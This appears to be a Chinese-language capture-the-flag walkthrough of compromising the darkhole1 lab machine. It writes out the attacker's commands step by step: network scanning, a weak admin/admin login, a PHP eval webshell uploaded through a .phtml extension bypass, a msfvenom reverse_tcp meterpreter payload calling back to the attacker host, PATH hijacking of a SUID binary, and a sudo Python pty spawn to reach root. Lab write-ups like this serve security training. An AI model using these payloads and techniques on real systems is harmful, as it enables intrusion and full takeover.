该实验通过NAT网络连接的KaliLinux攻击机对靶机darkhole1进行信息收集,包括主机发现、端口扫描和目录遍历。利用弱口令登录并上传一句话木马,通过修改后缀绕过限制,成功获取Webshell。之后尝试权限提升,通过SUID权限的toto程序切换到john用户并反弹shell,最终找到提权方法获取root权限并找到flag。
实验主机:darkhole1靶机一台/Kali linux攻击机一台
实验网络:NAT网络
实验目标:获取靶机的Root权限拿到flag
难易程度:中等
一 部署环境
kali与虚拟机全部为NAT连接
二 测试步骤
第一步:信息收集
步骤一:发现主机
arp-scan -l
步骤二:端口探测
nmap -A -T4 -p- 192.168.41.149 
步骤三:进行目录遍历 发现没有可用的
dirb http://192.168.41.149
第二步:漏洞利用 获取webshell
步骤一:在界面 发现登录界面 尝试弱口令登录 admin admin 成功
步骤二:发现有上传文件地方 上传一句话木马 发现有限制
<?php @eval($_POST['cmd']);?>
步骤三:修改后缀名为允许上传的格式 .jpg/.png/.gif 进行上传抓包 并修改后缀为php后放包
不知道为啥没成功
修改后缀为不常见的试一下 .phtml 成功 连接蚁剑
步骤四:查看当前用户权限
第三步:权限提升
步骤一:查看是否有可利用的提权文件或者看能否sudo
步骤二:发现并没有可利用的,查看存在其他用户 发现其他两个 john
步骤三:切换到john的用户家目录看有没有有用的 发现toto为SUID权限但是未成功
echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto
步骤四:反弹shell尝试一下 将msf木马通过蚁剑传到根目录 并进行访问
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.41.130 LPORT=4444 R > shell.php
//监听
msfconsole
set payload php/meterpreter/reverse_tcp
set lhost 192.168.41.130
set lport 4444步骤五:同步骤三 切换到john的用户家目录 利用toto提权
echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto
步骤六:成功 发现有密码:root123 查看此用户可执行的命令
步骤七:发现能够执行file.py 将提权写入file.py
echo "import pty;pty.spawn('/bin/bash')" > file.py步骤八:执行 并查找flag
sudo python3 /home/john/file.py
962
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
